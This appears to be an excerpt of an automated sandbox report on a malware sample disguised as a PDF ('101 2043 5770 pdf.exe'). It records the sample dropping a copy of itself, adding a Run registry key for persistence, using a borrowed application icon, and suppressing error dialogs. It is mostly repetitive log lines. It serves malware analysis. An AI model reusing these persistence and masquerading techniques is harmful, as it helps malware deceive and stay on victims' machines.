Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf			Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon306.png

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
